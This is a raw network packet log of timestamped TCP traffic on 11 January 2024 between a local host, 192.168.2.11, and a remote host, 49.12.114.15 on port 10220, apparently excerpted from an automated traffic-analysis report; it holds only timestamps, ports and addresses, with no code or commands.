                                                                                                                                                  Jan 11, 2024 13:35:16.024842978 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024864912 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024894953 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024914026 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024951935 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024966955 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025008917 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025019884 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025063038 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025075912 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025116920 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025135994 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025188923 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025196075 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025244951 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025245905 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025295973 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025307894 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025357962 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025367975 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025414944 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025420904 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025465012 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025473118 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025511026 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025532007 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025568962 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025588989 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025640965 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025706053 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025760889 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025813103 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025813103 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025876045 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025880098 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025913954 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025937080 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.025978088 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.025989056 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026031017 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026053905 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026092052 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026104927 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026144028 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026166916 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026205063 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026257992 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026314020 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026355982 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026367903 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026410103 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026447058 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026487112 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026489973 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026525974 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026562929 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026597023 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026602983 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026639938 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026654005 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026694059 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026715040 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026756048 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026779890 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026822090 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026839972 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026904106 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.026926041 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.026987076 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027029037 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027050972 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027097940 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027120113 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027163029 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027200937 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027245045 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027328014 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027373075 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027374983 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027415037 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027472973 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027517080 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027537107 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027585983 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027587891 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027626038 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027695894 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027739048 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027750015 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027792931 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027806997 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027847052 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027864933 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027905941 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.027918100 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.027971983 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028022051 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028043032 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028090000 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028098106 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028146029 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028147936 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028211117 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028250933 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028289080 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028356075 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028394938 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028436899 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028480053 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028489113 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028532028 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028549910 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028600931 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028611898 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028656006 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028662920 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028703928 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028728962 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028770924 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028788090 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028829098 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028866053 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.028909922 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.028978109 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029020071 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029037952 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029079914 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029098988 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029162884 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029186964 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029202938 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029203892 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029254913 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029299974 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029320002 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029362917 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029385090 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029426098 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029464960 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029505968 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029517889 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029573917 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029611111 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029652119 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.029684067 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.029699087 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.201603889 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.201700926 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.201740026 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.201805115 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.201845884 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.201855898 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.201900959 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203521013 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203545094 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203562021 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203572035 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203578949 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203593016 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203597069 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203613997 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203629971 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203633070 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203648090 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203656912 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203670979 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203674078 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203691959 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203701019 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203711033 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203716040 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203728914 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203733921 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203747034 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203752041 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203768969 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203773975 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203787088 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203794003 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203804016 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203813076 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203823090 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203831911 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203840017 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203856945 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203857899 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203874111 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203886032 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203891039 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203902006 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203910112 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203927040 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203934908 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203943968 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203960896 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203967094 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203978062 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.203988075 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.203995943 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204013109 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204018116 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204031944 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204045057 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204061985 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204469919 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204488993 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204508066 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204524040 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204531908 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204543114 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204560041 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204560995 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204576015 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204580069 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204597950 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204603910 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204616070 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204622030 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204633951 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204639912 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204652071 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.204657078 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204673052 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.204688072 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.205038071 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.205082893 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.205087900 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.205125093 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.205128908 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.205157995 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.205163956 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.205198050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.205272913 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.205312967 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.205315113 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.205355883 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.205378056 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.205411911 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.205419064 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.205451012 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.206674099 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.206736088 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.206783056 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.206798077 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.206840038 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.206859112 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.206902027 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.206993103 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207036018 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207057953 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.207077026 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.207096100 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207129002 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207166910 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.207328081 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207375050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.207489967 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207532883 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.207549095 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207588911 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.207663059 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207732916 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207772970 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.207793951 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207843065 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.207938910 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.207984924 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.208019972 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.208059072 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.208086967 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.208103895 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.208719015 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.208759069 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.208765030 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.208796024 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.208832979 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.208872080 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.208878994 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.208926916 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.208935976 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.208977938 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.208992958 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209028006 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209033966 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209065914 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209088087 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209124088 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209145069 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209193945 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209193945 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209252119 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209258080 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209286928 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209294081 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209331989 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.209347963 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.209398031 CET102204973149.12.114.15192.168.2.11
